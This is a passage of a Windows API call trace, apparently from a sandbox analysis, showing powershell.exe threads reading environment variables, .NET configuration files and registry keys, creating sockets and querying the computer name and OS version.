	[0783.633] CloseHandle (hObject=0x3cc) returned 1
	[0904.697] CertFreeCRLContext (pCrlContext=0x1b3c6350) returned 1
	[0904.698] CertFreeCRLContext (pCrlContext=0x1b3c63d0) returned 1
	[0904.698] CertFreeCRLContext (pCrlContext=0x1ce6b9f0) returned 1
	[0904.699] CertFreeCRLContext (pCrlContext=0x1b3c6350) returned 1
	[0904.699] CertFreeCRLContext (pCrlContext=0x1ce6ba70) returned 1
	[0904.700] CloseHandle (hObject=0x3d8) returned 1
	[0904.700] CertCloseStore (hCertStore=0x3d1bb0, dwFlags=0x0) returned 1

Thread:
	id = 781
	os_tid = 0xbbc


Thread:
	id = 942
	os_tid = 0x1934

	[0509.793] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0509.798] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409
	[0509.802] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0509.802] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0509.803] CoTaskMemFree (pv=0x1b39d320) 
	[0509.804] VirtualQuery (in: lpAddress=0x1c85db00, lpBuffer=0x1c85e9c0, dwLength=0x30 | out: lpBuffer=0x1c85e9c0*(BaseAddress=0x1c85d000, AllocationBase=0x1bed0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0509.809] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0509.810] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0509.810] CoTaskMemFree (pv=0x1b39d320) 
	[0509.812] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0509.812] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0509.812] CoTaskMemFree (pv=0x1b39d320) 
	[0509.816] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0509.816] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0509.816] CoTaskMemFree (pv=0x1b39d320) 
	[0510.495] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0510.495] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0510.495] CoTaskMemFree (pv=0x1b39d320) 
	[0510.498] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0510.498] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0510.498] CoTaskMemFree (pv=0x1b39d320) 
	[0510.499] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0510.499] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0510.499] CoTaskMemFree (pv=0x1b39d320) 
	[0510.504] VirtualQuery (in: lpAddress=0x1c85ddb0, lpBuffer=0x1c85ec70, dwLength=0x30 | out: lpBuffer=0x1c85ec70*(BaseAddress=0x1c85d000, AllocationBase=0x1bed0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0510.505] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0510.505] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0510.505] CoTaskMemFree (pv=0x1b39d320) 
	[0510.507] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0510.507] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0510.507] CoTaskMemFree (pv=0x1b39d320) 
	[0510.507] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0510.507] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0510.508] CoTaskMemFree (pv=0x1b39d320) 
	[0510.509] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0510.509] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0510.509] CoTaskMemFree (pv=0x1b39d320) 
	[0510.513] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0510.513] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0510.513] CoTaskMemFree (pv=0x1b39d320) 
	[0511.173] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0511.173] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0511.173] CoTaskMemFree (pv=0x1b39d320) 
	[0511.175] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0511.175] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0511.175] CoTaskMemFree (pv=0x1b39d320) 
	[0511.176] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0511.177] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0511.177] CoTaskMemFree (pv=0x1b39d320) 
	[0511.179] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0511.179] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0511.179] CoTaskMemFree (pv=0x1b39d320) 
	[0511.180] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0511.180] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0511.180] CoTaskMemFree (pv=0x1b39d320) 
	[0511.182] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0511.182] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0511.182] CoTaskMemFree (pv=0x1b39d320) 
	[0511.778] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0511.778] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0511.778] CoTaskMemFree (pv=0x1b39d320) 
	[0511.792] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0511.792] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0511.792] CoTaskMemFree (pv=0x1b39d320) 
	[0512.492] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0512.492] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.492] CoTaskMemFree (pv=0x1b39d320) 
	[0512.496] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0512.496] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.496] CoTaskMemFree (pv=0x1b39d320) 
	[0512.500] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0512.500] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.500] CoTaskMemFree (pv=0x1b39d320) 
	[0512.504] CoTaskMemAlloc (cb=0x104) returned 0x1b39d320
	[0512.504] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39d320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.504] CoTaskMemFree (pv=0x1b39d320) 
	[0626.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c85d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0626.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c85d680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0630.245] CoTaskMemAlloc (cb=0x20c) returned 0x379ad0
	[0630.245] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x379ad0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0630.245] CoTaskMemFree (pv=0x379ad0) 
	[0630.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c85d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0635.354] GetCurrentProcess () returned 0xffffffffffffffff
	[0635.354] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c85d748 | out: TokenHandle=0x1c85d748*=0x30c) returned 1
	[0639.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c85d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30
	[0639.538] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c85d7f0 | out: lpFileInformation=0x1c85d7f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0639.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c85d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0639.539] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c85d7a0 | out: lpFileInformation=0x1c85d7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0639.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c85d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0639.541] SetErrorMode (uMode=0x1) returned 0x1
	[0639.541] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c
	[0639.541] GetFileType (hFile=0x36c) returned 0x1
	[0639.541] SetErrorMode (uMode=0x1) returned 0x1
	[0639.541] GetFileType (hFile=0x36c) returned 0x1
	[0639.544] GetFileSize (in: hFile=0x36c, lpFileSizeHigh=0x1c85d798 | out: lpFileSizeHigh=0x1c85d798*=0x0) returned 0x622a
	[0639.544] ReadFile (in: hFile=0x36c, lpBuffer=0x2dbb858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c85d6b8, lpOverlapped=0x0 | out: lpBuffer=0x2dbb858*, lpNumberOfBytesRead=0x1c85d6b8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.554] ReadFile (in: hFile=0x36c, lpBuffer=0x2dbb858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c85d1e8, lpOverlapped=0x0 | out: lpBuffer=0x2dbb858*, lpNumberOfBytesRead=0x1c85d1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.555] ReadFile (in: hFile=0x36c, lpBuffer=0x2dbb858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c85d1e8, lpOverlapped=0x0 | out: lpBuffer=0x2dbb858*, lpNumberOfBytesRead=0x1c85d1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.555] ReadFile (in: hFile=0x36c, lpBuffer=0x2dbb858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c85d1e8, lpOverlapped=0x0 | out: lpBuffer=0x2dbb858*, lpNumberOfBytesRead=0x1c85d1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.555] ReadFile (in: hFile=0x36c, lpBuffer=0x2dbb858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c85d1e8, lpOverlapped=0x0 | out: lpBuffer=0x2dbb858*, lpNumberOfBytesRead=0x1c85d1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0639.562] ReadFile (in: hFile=0x36c, lpBuffer=0x2dbb858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c85d328, lpOverlapped=0x0 | out: lpBuffer=0x2dbb858*, lpNumberOfBytesRead=0x1c85d328*=0x1000, lpOverlapped=0x0) returned 1
	[0639.562] ReadFile (in: hFile=0x36c, lpBuffer=0x2dbb858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c85d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2dbb858*, lpNumberOfBytesRead=0x1c85d1a8*=0x22a, lpOverlapped=0x0) returned 1
	[0639.562] ReadFile (in: hFile=0x36c, lpBuffer=0x2dbb858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c85d248, lpOverlapped=0x0 | out: lpBuffer=0x2dbb858*, lpNumberOfBytesRead=0x1c85d248*=0x0, lpOverlapped=0x0) returned 1
	[0639.563] CloseHandle (hObject=0x36c) returned 1
	[0639.564] CoTaskMemAlloc (cb=0x20c) returned 0x379ad0
	[0639.564] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x379ad0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0639.564] CoTaskMemFree (pv=0x379ad0) 
	[0639.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c85d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0639.564] GetCurrentProcess () returned 0xffffffffffffffff
	[0639.564] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c85d9a8 | out: TokenHandle=0x1c85d9a8*=0x36c) returned 1
	[0639.565] GetCurrentProcess () returned 0xffffffffffffffff
	[0639.565] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c85d9a8 | out: TokenHandle=0x1c85d9a8*=0x310) returned 1
	[0639.566] GetCurrentProcess () returned 0xffffffffffffffff
	[0639.566] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c85d748 | out: TokenHandle=0x1c85d748*=0x328) returned 1
	[0639.567] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c85d7a0 | out: lpFileInformation=0x1c85d7a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0639.568] GetCurrentProcess () returned 0xffffffffffffffff
	[0639.568] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c85d9a8 | out: TokenHandle=0x1c85d9a8*=0x32c) returned 1
	[0639.568] GetCurrentProcess () returned 0xffffffffffffffff
	[0639.568] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c85d9a8 | out: TokenHandle=0x1c85d9a8*=0x380) returned 1
	[0644.550] GetCurrentProcess () returned 0xffffffffffffffff
	[0644.550] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c85d628 | out: TokenHandle=0x1c85d628*=0x30c) returned 1
	[0657.142] GetCurrentProcess () returned 0xffffffffffffffff
	[0657.142] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c85d628 | out: TokenHandle=0x1c85d628*=0x32c) returned 1
	[0657.160] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x36c
	[0657.160] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x380
	[0668.157] GetCurrentProcess () returned 0xffffffffffffffff
	[0668.157] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c85d5f8 | out: TokenHandle=0x1c85d5f8*=0x310) returned 1
	[0676.567] GetCurrentProcess () returned 0xffffffffffffffff
	[0676.567] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c85d5f8 | out: TokenHandle=0x1c85d5f8*=0x328) returned 1
	[0680.320] GetCurrentProcess () returned 0xffffffffffffffff
	[0680.320] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c85d538 | out: TokenHandle=0x1c85d538*=0x384) returned 1
	[0680.329] GetCurrentProcess () returned 0xffffffffffffffff
	[0680.329] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c85d538 | out: TokenHandle=0x1c85d538*=0x388) returned 1
	[0683.443] GetCurrentProcess () returned 0xffffffffffffffff
	[0683.443] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c85db78 | out: TokenHandle=0x1c85db78*=0x378) returned 1
	[0703.064] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c85bc38 | out: phkResult=0x1c85bc38*=0x30c) returned 0x0
	[0703.064] RegQueryValueExW (in: hKey=0x30c, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c85bbbc, lpData=0x0, lpcbData=0x1c85bbb8*=0x0 | out: lpType=0x1c85bbbc*=0x1, lpData=0x0, lpcbData=0x1c85bbb8*=0xe) returned 0x0
	[0703.064] CoTaskMemAlloc (cb=0x12) returned 0x1b3d5be0
	[0703.064] RegQueryValueExW (in: hKey=0x30c, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c85bb8c, lpData=0x1b3d5be0, lpcbData=0x1c85bb88*=0xe | out: lpType=0x1c85bb8c*=0x1, lpData="Client", lpcbData=0x1c85bb88*=0xe) returned 0x0
	[0703.064] CoTaskMemFree (pv=0x1b3d5be0) 
	[0703.064] RegCloseKey (hKey=0x30c) returned 0x0
	[0703.074] CoTaskMemAlloc (cb=0xcd0) returned 0x1b3ce000
	[0708.774] RasEnumConnectionsW (in: param_1=0x1b3ce000, param_2=0x1c85dbcc, param_3=0x1c85dbc8 | out: param_1=0x1b3ce000, param_2=0x1c85dbcc, param_3=0x1c85dbc8) returned 0x0
	[0708.779] CoTaskMemFree (pv=0x1b3ce000) 
	[0708.786] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1c85d9d8 | out: lpWSAData=0x1c85d9d8) returned 0
	[0708.798] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3cc
	[0708.804] setsockopt (s=0x3cc, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0708.804] closesocket (s=0x3cc) returned 0
	[0708.804] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3cc
	[0708.806] setsockopt (s=0x3cc, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0708.806] closesocket (s=0x3cc) returned 0
	[0711.585] GetCurrentProcess () returned 0xffffffffffffffff
	[0711.585] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c85d258 | out: TokenHandle=0x1c85d258*=0x3cc) returned 1
	[0711.598] GetCurrentProcess () returned 0xffffffffffffffff
	[0711.598] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c85d258 | out: TokenHandle=0x1c85d258*=0x3d0) returned 1
	[0719.146] GetCurrentProcessId () returned 0xf38
	[0722.342] CoTaskMemAlloc (cb=0x204) returned 0x3ba3f0
	[0722.342] GetComputerNameW (in: lpBuffer=0x3ba3f0, nSize=0x2da9810 | out: lpBuffer="XDUWTFONO", nSize=0x2da9810) returned 1
	[0722.342] CoTaskMemFree (pv=0x3ba3f0) 
	[0722.343] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c85d738 | out: phkResult=0x1c85d738*=0x3d4) returned 0x0
	[0722.343] RegQueryValueExW (in: hKey=0x3d4, lpValueName="Library", lpReserved=0x0, lpType=0x1c85d6bc, lpData=0x0, lpcbData=0x1c85d6b8*=0x0 | out: lpType=0x1c85d6bc*=0x1, lpData=0x0, lpcbData=0x1c85d6b8*=0x1c) returned 0x0
	[0722.343] CoTaskMemAlloc (cb=0x20) returned 0x1b3d2af0
	[0722.343] RegQueryValueExW (in: hKey=0x3d4, lpValueName="Library", lpReserved=0x0, lpType=0x1c85d68c, lpData=0x1b3d2af0, lpcbData=0x1c85d688*=0x1c | out: lpType=0x1c85d68c*=0x1, lpData="netfxperf.dll", lpcbData=0x1c85d688*=0x1c) returned 0x0
	[0722.343] CoTaskMemFree (pv=0x1b3d2af0) 
	[0722.343] RegQueryValueExW (in: hKey=0x3d4, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c85d6bc, lpData=0x0, lpcbData=0x1c85d6b8*=0x0 | out: lpType=0x1c85d6bc*=0x4, lpData=0x0, lpcbData=0x1c85d6b8*=0x4) returned 0x0
	[0722.344] RegQueryValueExW (in: hKey=0x3d4, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c85d6c0, lpData=0x1c85d6bc, lpcbData=0x1c85d6b8*=0x4 | out: lpType=0x1c85d6c0*=0x4, lpData=0x1c85d6bc*=0x1, lpcbData=0x1c85d6b8*=0x4) returned 0x0
	[0722.345] RegQueryValueExW (in: hKey=0x3d4, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c85d6bc, lpData=0x0, lpcbData=0x1c85d6b8*=0x0 | out: lpType=0x1c85d6bc*=0x4, lpData=0x0, lpcbData=0x1c85d6b8*=0x4) returned 0x0
	[0722.345] RegQueryValueExW (in: hKey=0x3d4, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c85d6c0, lpData=0x1c85d6bc, lpcbData=0x1c85d6b8*=0x4 | out: lpType=0x1c85d6c0*=0x4, lpData=0x1c85d6bc*=0x137a, lpcbData=0x1c85d6b8*=0x4) returned 0x0
	[0722.345] RegCloseKey (hKey=0x3d4) returned 0x0
	[0723.863] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c85d6f8 | out: phkResult=0x1c85d6f8*=0x3d4) returned 0x0
	[0723.863] RegQueryValueExW (in: hKey=0x3d4, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c85d67c, lpData=0x0, lpcbData=0x1c85d678*=0x0 | out: lpType=0x1c85d67c*=0x4, lpData=0x0, lpcbData=0x1c85d678*=0x4) returned 0x0
	[0723.863] RegQueryValueExW (in: hKey=0x3d4, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c85d680, lpData=0x1c85d67c, lpcbData=0x1c85d678*=0x4 | out: lpType=0x1c85d680*=0x4, lpData=0x1c85d67c*=0x3, lpcbData=0x1c85d678*=0x4) returned 0x0
	[0723.863] RegQueryValueExW (in: hKey=0x3d4, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c85d67c, lpData=0x0, lpcbData=0x1c85d678*=0x0 | out: lpType=0x1c85d67c*=0x4, lpData=0x0, lpcbData=0x1c85d678*=0x4) returned 0x0
	[0723.863] RegQueryValueExW (in: hKey=0x3d4, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c85d680, lpData=0x1c85d67c, lpcbData=0x1c85d678*=0x4 | out: lpType=0x1c85d680*=0x4, lpData=0x1c85d67c*=0x20000, lpcbData=0x1c85d678*=0x4) returned 0x0
	[0723.863] RegQueryValueExW (in: hKey=0x3d4, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c85d67c, lpData=0x0, lpcbData=0x1c85d678*=0x0 | out: lpType=0x1c85d67c*=0x3, lpData=0x0, lpcbData=0x1c85d678*=0xaa) returned 0x0
	[0723.864] RegQueryValueExW (in: hKey=0x3d4, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c85d67c, lpData=0x2dacb00, lpcbData=0x1c85d678*=0xaa | out: lpType=0x1c85d67c*=0x3, lpData=0x2dacb00*, lpcbData=0x1c85d678*=0xaa) returned 0x0
	[0723.868] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0725.540] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x1c85d630, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x0
	[0725.542] OpenFileMappingW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x3dc
	[0725.546] MapViewOfFile (hFileMappingObject=0x3dc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2190000
	[0725.547] VirtualQuery (in: lpAddress=0x2190000, lpBuffer=0x1c85d628, dwLength=0x30 | out: lpBuffer=0x1c85d628*(BaseAddress=0x2190000, AllocationBase=0x2190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30
	[0725.547] LocalFree (hMem=0x3e2120) returned 0x0
	[0725.548] RegCloseKey (hKey=0x3d4) returned 0x0
	[0727.281] GetVersionExW (in: lpVersionInformation=0x1c85c600*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c85c600*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
